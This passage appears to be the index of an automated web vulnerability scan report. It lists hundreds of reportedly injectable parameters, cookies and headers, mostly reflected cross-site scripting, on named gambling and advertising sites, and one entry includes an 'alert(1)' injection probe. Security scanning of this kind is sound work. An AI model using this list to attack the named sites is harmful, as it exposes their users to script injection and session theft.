1.2. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya [User-Agent HTTP header]
1.3. https://scratch.betsson.com/en/Slots/Fantasia [site cookie]
1.4. https://scratch.betsson.com/en/Sports/Bowling [User-Agent HTTP header]
1.5. https://scratch.betsson.com/en/Sports/World-Champions [Referer HTTP header]
1.6. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 1]
1.7. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 2]
1.8. http://scratch.co.uk/resources/style.css [REST URL parameter 1]
1.9. http://scratch.co.uk/resources/style.css [REST URL parameter 2]
1.10. http://trk.primescratchcards.com/ [ac parameter]
1.11. http://www.interwetten.org/ [Referer HTTP header]
1.12. http://www.neogames.com/our-partners [name of an arbitrarily supplied request parameter]
3. Cross-site scripting (reflected)
3.1. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]
3.2. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]
3.3. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]
3.4. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]
3.5. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]
3.6. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]
3.7. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]
3.8. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]
3.9. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]
3.10. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]
3.11. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]
3.12. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]
3.13. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]
3.14. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]
3.15. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]
3.16. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]
3.17. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]
3.18. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]
3.19. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]
3.20. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]
3.21. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]
3.22. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]
3.23. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]
3.24. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]
3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
3.26. http://bid.openx.net/json [c parameter]
3.27. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]
3.28. http://scratch.co.uk/ [currency parameter]
3.29. http://scratch.co.uk/ [currency parameter]
3.30. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [CUR parameter]
3.31. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [PRD parameter]
3.32. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [UNIQUEVISITORID parameter]
3.33. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [AR parameter]
3.34. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]
3.35. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]
3.36. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BO parameter]
3.37. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [PAR parameter]
3.38. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [RegistrationMode parameter]
3.39. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [SDN parameter]
3.40. http://trk.primescratchcards.com/ [ac parameter]
3.41. https://www.aspireaffiliates.com/ [CMI parameter]
3.42. https://www.aspireaffiliates.com/ [CMI parameter]
3.43. https://www.aspireaffiliates.com/ [CMI parameter]
3.47. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]
3.48. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]
3.49. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]
3.50. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx [CMI parameter]
3.64. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]
3.65. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]
3.66. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]
3.67. http://www.bet365.com/home/ [name of an arbitrarily supplied request parameter]
3.68. http://www.bet365.com/home/default.asp [name of an arbitrarily supplied request parameter]
3.69. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]
3.70. http://www.okscratchcards.com/ [70343%27-alert(1)-%2789d3bb43680 parameter]
3.71. http://www.okscratchcards.com/ [name of an arbitrarily supplied request parameter]
3.72. http://www.okscratchcards.com/terms-and-conditions.aspx [& parameter]
3.74. http://www.primescratchcards.com/index.asp [curr parameter]
3.75. http://www.primescratchcards.com/index.asp [curr parameter]
3.76. http://ad.yieldmanager.com/imp [Referer HTTP header]
3.77. https://www.interwetten.com/sportsbook/registrationform.aspx [User-Agent HTTP header]
3.78. http://home.okscratchcards.com/AboutUs.aspx [BO cookie]
3.79. http://home.okscratchcards.com/AboutUs.aspx [RegistrationMode cookie]
3.80. http://home.okscratchcards.com/ContactUsMail.aspx [BO cookie]
3.81. http://home.okscratchcards.com/ContactUsMail.aspx [RegistrationMode cookie]
3.82. http://home.okscratchcards.com/FairPlay.aspx [BO cookie]
3.83. http://home.okscratchcards.com/FairPlay.aspx [RegistrationMode cookie]
3.84. http://home.okscratchcards.com/PlayersClub.aspx [BO cookie]
3.85. http://home.okscratchcards.com/PlayersClub.aspx [RegistrationMode cookie]
3.86. http://home.okscratchcards.com/Promotions.aspx [BO cookie]
3.87. http://home.okscratchcards.com/Promotions.aspx [RegistrationMode cookie]
3.88. http://home.okscratchcards.com/Responsible.aspx [BO cookie]
3.89. http://home.okscratchcards.com/Responsible.aspx [RegistrationMode cookie]
3.90. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [BO cookie]
3.91. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
3.92. http://home.okscratchcards.com/Terms.aspx [BO cookie]
3.93. http://home.okscratchcards.com/Terms.aspx [RegistrationMode cookie]
3.94. http://home.okscratchcards.com/help.aspx [BO cookie]
3.95. http://home.okscratchcards.com/help.aspx [RegistrationMode cookie]
3.96. http://okscratchcards.com/ [name of an arbitrarily supplied request parameter]
3.97. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]
3.98. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]
3.99. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]
3.100. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]
3.101. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]
3.102. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]
3.103. http://primescratchcards.com/images/Responsible.asp [ARC cookie]
3.104. http://primescratchcards.com/images/Responsible.asp [ARC cookie]
3.105. http://primescratchcards.com/images/Responsible.asp [ARC cookie]
3.106. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]
3.107. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]
3.108. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]
3.109. http://primescratchcards.com/images/aboutus.asp [ARC cookie]
3.110. http://primescratchcards.com/images/aboutus.asp [ARC cookie]
3.111. http://primescratchcards.com/images/aboutus.asp [ARC cookie]
3.112. http://primescratchcards.com/images/affiliates.asp [ARC cookie]
3.113. http://primescratchcards.com/images/affiliates.asp [ARC cookie]
3.114. http://primescratchcards.com/images/affiliates.asp [ARC cookie]
3.115. http://primescratchcards.com/images/bg.jpg [ARC cookie]
3.116. http://primescratchcards.com/images/bg.jpg [ARC cookie]
3.117. http://primescratchcards.com/images/bg.jpg [ARC cookie]
3.118. http://primescratchcards.com/images/contactus.asp [ARC cookie]
3.119. http://primescratchcards.com/images/contactus.asp [ARC cookie]
3.120. http://primescratchcards.com/images/contactus.asp [ARC cookie]
3.121. http://primescratchcards.com/images/fairplay.asp [ARC cookie]
3.122. http://primescratchcards.com/images/fairplay.asp [ARC cookie]
3.123. http://primescratchcards.com/images/fairplay.asp [ARC cookie]
3.124. http://primescratchcards.com/images/help.asp [ARC cookie]
3.125. http://primescratchcards.com/images/help.asp [ARC cookie]
3.126. http://primescratchcards.com/images/help.asp [ARC cookie]
3.127. http://primescratchcards.com/images/index.asp [ARC cookie]
3.128. http://primescratchcards.com/images/index.asp [ARC cookie]
3.129. http://primescratchcards.com/images/index.asp [ARC cookie]
3.130. http://primescratchcards.com/images/media.asp [ARC cookie]
3.131. http://primescratchcards.com/images/media.asp [ARC cookie]
3.132. http://primescratchcards.com/images/media.asp [ARC cookie]
3.133. http://primescratchcards.com/images/playersclub.asp [ARC cookie]
3.134. http://primescratchcards.com/images/playersclub.asp [ARC cookie]
3.135. http://primescratchcards.com/images/playersclub.asp [ARC cookie]
3.136. http://primescratchcards.com/images/promotions.asp [ARC cookie]
3.137. http://primescratchcards.com/images/promotions.asp [ARC cookie]
3.138. http://primescratchcards.com/images/promotions.asp [ARC cookie]
3.139. http://primescratchcards.com/images/terms.asp [ARC cookie]
3.140. http://primescratchcards.com/images/terms.asp [ARC cookie]
3.141. http://primescratchcards.com/images/terms.asp [ARC cookie]
3.142. http://primescratchcards.com/images/underage.asp [ARC cookie]
3.143. http://primescratchcards.com/images/underage.asp [ARC cookie]
3.144. http://primescratchcards.com/images/underage.asp [ARC cookie]
3.145. http://scratch.co.uk/ [affiliate cookie]
3.146. http://scratch.co.uk/ [affiliate cookie]
3.147. http://scratch.co.uk/ [currency cookie]
3.148. http://scratch.co.uk/ [currency cookie]
3.149. http://scratch.co.uk/ [currency cookie]
3.150. http://scratch.co.uk/ [currency cookie]
3.151. http://scratch.co.uk/ [lang cookie]
3.152. http://scratch.co.uk/ [lang cookie]
3.153. http://scratch.co.uk/ [neogamesemail cookie]
3.154. http://scratch.co.uk/about/ [affiliate cookie]
3.155. http://scratch.co.uk/about/ [currency cookie]
3.156. http://scratch.co.uk/about/ [lang cookie]
3.157. http://scratch.co.uk/contact/ [affiliate cookie]
3.158. http://scratch.co.uk/contact/ [currency cookie]
3.159. http://scratch.co.uk/contact/ [lang cookie]
3.160. http://scratch.co.uk/help/ [affiliate cookie]
3.161. http://scratch.co.uk/help/ [currency cookie]
3.162. http://scratch.co.uk/help/ [lang cookie]
3.163. http://scratch.co.uk/help/deposit/methods/ [affiliate cookie]
3.164. http://scratch.co.uk/help/deposit/methods/ [currency cookie]
3.165. http://scratch.co.uk/help/deposit/methods/ [lang cookie]
3.166. http://scratch.co.uk/help/fairplay/ [affiliate cookie]
3.167. http://scratch.co.uk/help/fairplay/ [currency cookie]
3.168. http://scratch.co.uk/help/fairplay/ [lang cookie]
3.169. http://scratch.co.uk/help/privacy/ [affiliate cookie]
3.170. http://scratch.co.uk/help/privacy/ [currency cookie]
3.171. http://scratch.co.uk/help/privacy/ [lang cookie]
3.172. http://scratch.co.uk/invite-friend/ [affiliate cookie]
3.173. http://scratch.co.uk/invite-friend/ [currency cookie]
3.174. http://scratch.co.uk/invite-friend/ [lang cookie]
3.175. http://scratch.co.uk/over-18/ [affiliate cookie]
3.176. http://scratch.co.uk/over-18/ [currency cookie]
3.177. http://scratch.co.uk/over-18/ [lang cookie]
3.178. http://scratch.co.uk/problem-gambling/ [affiliate cookie]
3.179. http://scratch.co.uk/problem-gambling/ [currency cookie]
3.180. http://scratch.co.uk/problem-gambling/ [lang cookie]
3.181. http://scratch.co.uk/promotions/ [affiliate cookie]
3.182. http://scratch.co.uk/promotions/ [currency cookie]
3.183. http://scratch.co.uk/promotions/ [lang cookie]
3.184. http://scratch.co.uk/promotions/argos/ [affiliate cookie]
3.185. http://scratch.co.uk/promotions/argos/ [currency cookie]
3.186. http://scratch.co.uk/promotions/argos/ [currency cookie]
3.187. http://scratch.co.uk/promotions/argos/ [lang cookie]
3.188. http://scratch.co.uk/terms/ [affiliate cookie]
3.189. http://scratch.co.uk/terms/ [currency cookie]
3.190. http://scratch.co.uk/terms/ [lang cookie]
3.191. http://scratch.co.uk/vis-club/ [affiliate cookie]
3.192. http://scratch.co.uk/vis-club/ [currency cookie]
3.193. http://scratch.co.uk/vis-club/ [lang cookie]
3.194. http://scratch.co.uk/winners/ [affiliate cookie]
3.195. http://scratch.co.uk/winners/ [currency cookie]
3.196. http://scratch.co.uk/winners/ [lang cookie]
3.197. http://www.bigmoneyscratch.com/AboutUs.aspx [BO cookie]
3.198. http://www.bigmoneyscratch.com/AboutUs.aspx [RegistrationMode cookie]
3.199. http://www.bigmoneyscratch.com/Affiliates.aspx [BO cookie]
3.200. http://www.bigmoneyscratch.com/Affiliates.aspx [RegistrationMode cookie]
3.201. http://www.bigmoneyscratch.com/ContactUsChat.aspx [BO cookie]
3.202. http://www.bigmoneyscratch.com/ContactUsChat.aspx [RegistrationMode cookie]
3.203. http://www.bigmoneyscratch.com/ContactUsFax.aspx [BO cookie]
3.204. http://www.bigmoneyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]
3.205. http://www.bigmoneyscratch.com/ContactUsMail.aspx [BO cookie]
3.206. http://www.bigmoneyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]
3.207. http://www.bigmoneyscratch.com/ContactUsTel.aspx [BO cookie]
3.208. http://www.bigmoneyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]
3.209. http://www.bigmoneyscratch.com/FAQ.aspx [BO cookie]
3.210. http://www.bigmoneyscratch.com/FAQ.aspx [RegistrationMode cookie]
3.211. http://www.bigmoneyscratch.com/FairPlay.aspx [BO cookie]
3.212. http://www.bigmoneyscratch.com/FairPlay.aspx [RegistrationMode cookie]
3.213. http://www.bigmoneyscratch.com/Help.aspx [BO cookie]
3.214. http://www.bigmoneyscratch.com/Help.aspx [RegistrationMode cookie]
3.215. http://www.bigmoneyscratch.com/Home.aspx [BO cookie]
3.216. http://www.bigmoneyscratch.com/Home.aspx [RegistrationMode cookie]
3.217. http://www.bigmoneyscratch.com/InviteFriend.aspx [BO cookie]
3.218. http://www.bigmoneyscratch.com/InviteFriend.aspx [RegistrationMode cookie]
3.219. http://www.bigmoneyscratch.com/Mobile.aspx [BO cookie]
3.220. http://www.bigmoneyscratch.com/Mobile.aspx [RegistrationMode cookie]
3.221. http://www.bigmoneyscratch.com/PlayersClub.aspx [BO cookie]
3.222. http://www.bigmoneyscratch.com/PlayersClub.aspx [RegistrationMode cookie]
3.223. http://www.bigmoneyscratch.com/Promotions.aspx [BO cookie]
3.224. http://www.bigmoneyscratch.com/Promotions.aspx [RegistrationMode cookie]
3.225. http://www.bigmoneyscratch.com/Responsible.aspx [BO cookie]
3.226. http://www.bigmoneyscratch.com/Responsible.aspx [RegistrationMode cookie]
3.227. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [BO cookie]
3.228. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
3.229. http://www.bigmoneyscratch.com/Terms.aspx [BO cookie]
3.230. http://www.bigmoneyscratch.com/Terms.aspx [RegistrationMode cookie]
3.231. http://www.bigmoneyscratch.com/UnderAge.aspx [BO cookie]
3.232. http://www.bigmoneyscratch.com/UnderAge.aspx [RegistrationMode cookie]
3.233. http://www.hopa.com/ [BO cookie]
3.234. http://www.hopa.com/ [RegistrationMode cookie]
3.235. http://www.info.crazyscratch.com/AboutUs.aspx [BO cookie]
3.236. http://www.info.crazyscratch.com/AboutUs.aspx [RegistrationMode cookie]
3.237. http://www.info.crazyscratch.com/ContactUsFax.aspx [BO cookie]
3.238. http://www.info.crazyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]
3.239. http://www.info.crazyscratch.com/ContactUsMail.aspx [BO cookie]
3.240. http://www.info.crazyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]
3.241. http://www.info.crazyscratch.com/ContactUsTel.aspx [BO cookie]
3.242. http://www.info.crazyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]
3.243. http://www.info.crazyscratch.com/FairPlay.aspx [BO cookie]
3.244. http://www.info.crazyscratch.com/FairPlay.aspx [RegistrationMode cookie]
3.245. http://www.info.crazyscratch.com/Help.aspx [BO cookie]
3.246. http://www.info.crazyscratch.com/Help.aspx [RegistrationMode cookie]
3.247. http://www.info.crazyscratch.com/InviteFriend.aspx [BO cookie]
3.248. http://www.info.crazyscratch.com/InviteFriend.aspx [RegistrationMode cookie]
3.249. http://www.info.crazyscratch.com/PlayersClub.aspx [BO cookie]
3.250. http://www.info.crazyscratch.com/PlayersClub.aspx [RegistrationMode cookie]
3.251. http://www.info.crazyscratch.com/Privacy.aspx [BO cookie]
3.252. http://www.info.crazyscratch.com/Privacy.aspx [RegistrationMode cookie]
3.253. http://www.info.crazyscratch.com/Promotions.aspx [BO cookie]
3.254. http://www.info.crazyscratch.com/Promotions.aspx [RegistrationMode cookie]
3.255. http://www.info.crazyscratch.com/Responsible.aspx [BO cookie]
3.256. http://www.info.crazyscratch.com/Responsible.aspx [RegistrationMode cookie]
3.257. http://www.info.crazyscratch.com/Terms.aspx [BO cookie]
3.258. http://www.info.crazyscratch.com/Terms.aspx [RegistrationMode cookie]
3.259. http://www.info.crazyscratch.com/UnderAge.aspx [BO cookie]
3.260. http://www.info.crazyscratch.com/UnderAge.aspx [RegistrationMode cookie]
3.261. http://www.karamba.com/ [BO cookie]
3.262. http://www.karamba.com/ [RegistrationMode cookie]
3.263. http://www.karamba.com/AboutUs.aspx [BO cookie]
3.264. http://www.karamba.com/AboutUs.aspx [RegistrationMode cookie]
3.265. http://www.karamba.com/FairPlay.aspx [BO cookie]
3.266. http://www.karamba.com/FairPlay.aspx [RegistrationMode cookie]
3.267. http://www.karamba.com/Help.aspx [BO cookie]
3.268. http://www.karamba.com/Help.aspx [RegistrationMode cookie]
3.269. http://www.karamba.com/Home.aspx [BO cookie]
3.270. http://www.karamba.com/Home.aspx [RegistrationMode cookie]
3.271. http://www.karamba.com/InviteFriend.aspx [BO cookie]
3.272. http://www.karamba.com/InviteFriend.aspx [RegistrationMode cookie]
3.273. http://www.karamba.com/PlayersClub.aspx [BO cookie]
3.274. http://www.karamba.com/PlayersClub.aspx [RegistrationMode cookie]
3.275. http://www.karamba.com/Privacy.aspx [BO cookie]
3.276. http://www.karamba.com/Privacy.aspx [RegistrationMode cookie]
3.277. http://www.karamba.com/Promotions.aspx [BO cookie]
3.278. http://www.karamba.com/Promotions.aspx [RegistrationMode cookie]
3.279. http://www.karamba.com/Responsible.aspx [BO cookie]
3.280. http://www.karamba.com/Responsible.aspx [RegistrationMode cookie]
3.281. http://www.karamba.com/Sitemap.aspx [BO cookie]
3.282. http://www.karamba.com/Sitemap.aspx [RegistrationMode cookie]
3.283. http://www.karamba.com/Terms.aspx [BO cookie]
3.284. http://www.karamba.com/Terms.aspx [RegistrationMode cookie]
3.285. http://www.karamba.com/UnderAge.aspx [BO cookie]
3.286. http://www.karamba.com/UnderAge.aspx [RegistrationMode cookie]
3.287. http://www.karamba.com/click/Karamba.com/ENG/Home/ [BO cookie]
3.288. http://www.karamba.com/click/Karamba.com/ENG/Home/ [RegistrationMode cookie]
3.289. http://www.mundirasca.com/ [BO cookie]
3.290. http://www.mundirasca.com/ [RegistrationMode cookie]
3.291. http://www.mundirasca.com/AboutUs.aspx [BO cookie]
3.292. http://www.mundirasca.com/AboutUs.aspx [RegistrationMode cookie]
3.293. http://www.mundirasca.com/ContactUsChat.aspx [BO cookie]
3.294. http://www.mundirasca.com/ContactUsChat.aspx [RegistrationMode cookie]
3.295. http://www.mundirasca.com/ContactUsFax.aspx [BO cookie]
3.296. http://www.mundirasca.com/ContactUsFax.aspx [RegistrationMode cookie]
3.297. http://www.mundirasca.com/ContactUsMail.aspx [BO cookie]
3.298. http://www.mundirasca.com/ContactUsMail.aspx [RegistrationMode cookie]
3.299. http://www.mundirasca.com/ContactUsTel.aspx [BO cookie]
3.300. http://www.mundirasca.com/ContactUsTel.aspx [RegistrationMode cookie]
3.301. http://www.mundirasca.com/FAQ.aspx [BO cookie]
3.302. http://www.mundirasca.com/FAQ.aspx [RegistrationMode cookie]
3.303. http://www.mundirasca.com/FairPlay.aspx [BO cookie]
3.304. http://www.mundirasca.com/FairPlay.aspx [RegistrationMode cookie]
3.305. http://www.mundirasca.com/Help.aspx [BO cookie]
3.306. http://www.mundirasca.com/Help.aspx [RegistrationMode cookie]
3.307. http://www.mundirasca.com/InviteFriend.aspx [BO cookie]
3.308. http://www.mundirasca.com/InviteFriend.aspx [RegistrationMode cookie]
3.309. http://www.mundirasca.com/PlayersClub.aspx [BO cookie]
3.310. http://www.mundirasca.com/PlayersClub.aspx [RegistrationMode cookie]
3.311. http://www.mundirasca.com/Promotions.aspx [BO cookie]
3.312. http://www.mundirasca.com/Promotions.aspx [RegistrationMode cookie]
3.313. http://www.mundirasca.com/Responsible.aspx [BO cookie]
3.314. http://www.mundirasca.com/Responsible.aspx [RegistrationMode cookie]
3.315. http://www.mundirasca.com/SecurityAndPrivacy.aspx [BO cookie]
3.316. http://www.mundirasca.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
3.317. http://www.mundirasca.com/Terms.aspx [BO cookie]
3.318. http://www.mundirasca.com/Terms.aspx [RegistrationMode cookie]
3.319. http://www.mundirasca.com/UnderAge.aspx [BO cookie]
3.320. http://www.mundirasca.com/UnderAge.aspx [RegistrationMode cookie]
3.321. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [BO cookie]
3.322. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [RegistrationMode cookie]
3.323. https://www.neogamespartners.com/ [CMI parameter]
3.324. https://www.neogamespartners.com/ [CMI parameter]
3.325. https://www.neogamespartners.com/ [CMI parameter]
3.326. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]
3.327. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]
3.328. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter]
3.329. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]
3.330. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]
3.331. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie]
3.332. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]
3.333. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]
3.334. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie]
3.335. http://www.primescratchcards.com/Responsible.asp [ARC cookie]
3.336. http://www.primescratchcards.com/Responsible.asp [ARC cookie]
3.337. http://www.primescratchcards.com/Responsible.asp [ARC cookie]
3.338. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]
3.339. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]
3.340. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie]
3.341. http://www.primescratchcards.com/aboutus.asp [ARC cookie]
3.342. http://www.primescratchcards.com/aboutus.asp [ARC cookie]
3.343. http://www.primescratchcards.com/aboutus.asp [ARC cookie]
3.344. http://www.primescratchcards.com/affiliates.asp [ARC cookie]
3.345. http://www.primescratchcards.com/affiliates.asp [ARC cookie]
3.346. http://www.primescratchcards.com/affiliates.asp [ARC cookie]
3.347. http://www.primescratchcards.com/contactus.asp [ARC cookie]
3.348. http://www.primescratchcards.com/contactus.asp [ARC cookie]
3.349. http://www.primescratchcards.com/contactus.asp [ARC cookie]
3.350. http://www.primescratchcards.com/fairplay.asp [ARC cookie]
3.351. http://www.primescratchcards.com/fairplay.asp [ARC cookie]
3.352. http://www.primescratchcards.com/fairplay.asp [ARC cookie]
3.353. http://www.primescratchcards.com/help.asp [ARC cookie]
3.354. http://www.primescratchcards.com/help.asp [ARC cookie]
3.355. http://www.primescratchcards.com/help.asp [ARC cookie]
3.356. http://www.primescratchcards.com/index.asp [ARC cookie]
3.357. http://www.primescratchcards.com/index.asp [ARC cookie]
3.358. http://www.primescratchcards.com/index.asp [ARC cookie]
3.359. http://www.primescratchcards.com/media.asp [ARC cookie]
3.360. http://www.primescratchcards.com/media.asp [ARC cookie]
3.361. http://www.primescratchcards.com/media.asp [ARC cookie]
3.362. http://www.primescratchcards.com/playersclub.asp [ARC cookie]
3.363. http://www.primescratchcards.com/playersclub.asp [ARC cookie]
3.364. http://www.primescratchcards.com/playersclub.asp [ARC cookie]
3.365. http://www.primescratchcards.com/promotions.asp [ARC cookie]
3.366. http://www.primescratchcards.com/promotions.asp [ARC cookie]
3.367. http://www.primescratchcards.com/promotions.asp [ARC cookie]
3.368. http://www.primescratchcards.com/terms.asp [ARC cookie]
3.369. http://www.primescratchcards.com/terms.asp [ARC cookie]
3.370. http://www.primescratchcards.com/terms.asp [ARC cookie]
3.371. http://www.primescratchcards.com/underage.asp [ARC cookie]
3.372. http://www.primescratchcards.com/underage.asp [ARC cookie]
3.373. http://www.primescratchcards.com/underage.asp [ARC cookie]
3.374. http://www.scratch2cash.com/ [BO cookie]
3.375. http://www.scratch2cash.com/ [RegistrationMode cookie]
3.376. http://www.scratch2cash.com/AboutUs.aspx [BO cookie]
3.377. http://www.scratch2cash.com/AboutUs.aspx [RegistrationMode cookie]
3.378. http://www.scratch2cash.com/ContactUsMail.aspx [BO cookie]
3.379. http://www.scratch2cash.com/ContactUsMail.aspx [RegistrationMode cookie]
3.380. http://www.scratch2cash.com/FairPlay.aspx [BO cookie]
3.381. http://www.scratch2cash.com/FairPlay.aspx [RegistrationMode cookie]
3.382. http://www.scratch2cash.com/Help.aspx [BO cookie]
3.383. http://www.scratch2cash.com/Help.aspx [RegistrationMode cookie]
3.384. http://www.scratch2cash.com/Home.aspx [BO cookie]
3.385. http://www.scratch2cash.com/Home.aspx [RegistrationMode cookie]
3.386. http://www.scratch2cash.com/InviteFriend.aspx [BO cookie]
3.387. http://www.scratch2cash.com/InviteFriend.aspx [RegistrationMode cookie]
3.388. http://www.scratch2cash.com/PlayersClub.aspx [BO cookie]
3.389. http://www.scratch2cash.com/PlayersClub.aspx [RegistrationMode cookie]
3.390. http://www.scratch2cash.com/Promotions.aspx [BO cookie]
3.391. http://www.scratch2cash.com/Promotions.aspx [RegistrationMode cookie]
3.392. http://www.scratch2cash.com/Responsible.aspx [BO cookie]
3.393. http://www.scratch2cash.com/Responsible.aspx [RegistrationMode cookie]
3.394. http://www.scratch2cash.com/SecurityAndPrivacy.aspx [BO cookie]
3.395. http://www.scratch2cash.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
3.396. http://www.scratch2cash.com/Sitemap.aspx [BO cookie]
3.397. http://www.scratch2cash.com/Sitemap.aspx [RegistrationMode cookie]
3.398. http://www.scratch2cash.com/Terms.aspx [BO cookie]
3.399. http://www.scratch2cash.com/Terms.aspx [RegistrationMode cookie]
3.400. http://www.scratch2cash.com/UnderAge.aspx [BO cookie]
3.401. http://www.scratch2cash.com/UnderAge.aspx [RegistrationMode cookie]
3.402. http://www.scratchcardheaven.com/AboutUs.aspx [BO cookie]
3.403. http://www.scratchcardheaven.com/AboutUs.aspx [RegistrationMode cookie]
3.404. http://www.scratchcardheaven.com/ContactUsMail.aspx [BO cookie]
3.405. http://www.scratchcardheaven.com/ContactUsMail.aspx [RegistrationMode cookie]
3.406. http://www.scratchcardheaven.com/FairPlay.aspx [BO cookie]
3.407. http://www.scratchcardheaven.com/FairPlay.aspx [RegistrationMode cookie]
3.408. http://www.scratchcardheaven.com/Help.aspx [BO cookie]
3.409. http://www.scratchcardheaven.com/Help.aspx [RegistrationMode cookie]
3.410. http://www.scratchcardheaven.com/Home.aspx [BO cookie]
3.411. http://www.scratchcardheaven.com/Home.aspx [RegistrationMode cookie]
3.412. http://www.scratchcardheaven.com/InviteFriend.aspx [BO cookie]
3.413. http://www.scratchcardheaven.com/InviteFriend.aspx [RegistrationMode cookie]
3.414. http://www.scratchcardheaven.com/PlayersClub.aspx [BO cookie]
3.415. http://www.scratchcardheaven.com/PlayersClub.aspx [RegistrationMode cookie]
3.416. http://www.scratchcardheaven.com/Promotions.aspx [BO cookie]
3.417. http://www.scratchcardheaven.com/Promotions.aspx [RegistrationMode cookie]
3.418. http://www.scratchcardheaven.com/Responsible.aspx [BO cookie]
3.419. http://www.scratchcardheaven.com/Responsible.aspx [RegistrationMode cookie]
3.420. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [BO cookie]
3.421. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
3.422. http://www.scratchcardheaven.com/Terms.aspx [BO cookie]
3.423. http://www.scratchcardheaven.com/Terms.aspx [RegistrationMode cookie]
3.424. http://www.scratchcardheaven.com/UnderAge.aspx [BO cookie]
3.425. http://www.scratchcardheaven.com/UnderAge.aspx [RegistrationMode cookie]
3.426. http://www.svenskalotter.com/ [BO cookie]
3.427. http://www.svenskalotter.com/ [RegistrationMode cookie]
3.428. http://www.svenskalotter.com/AboutUs.aspx [BO cookie]
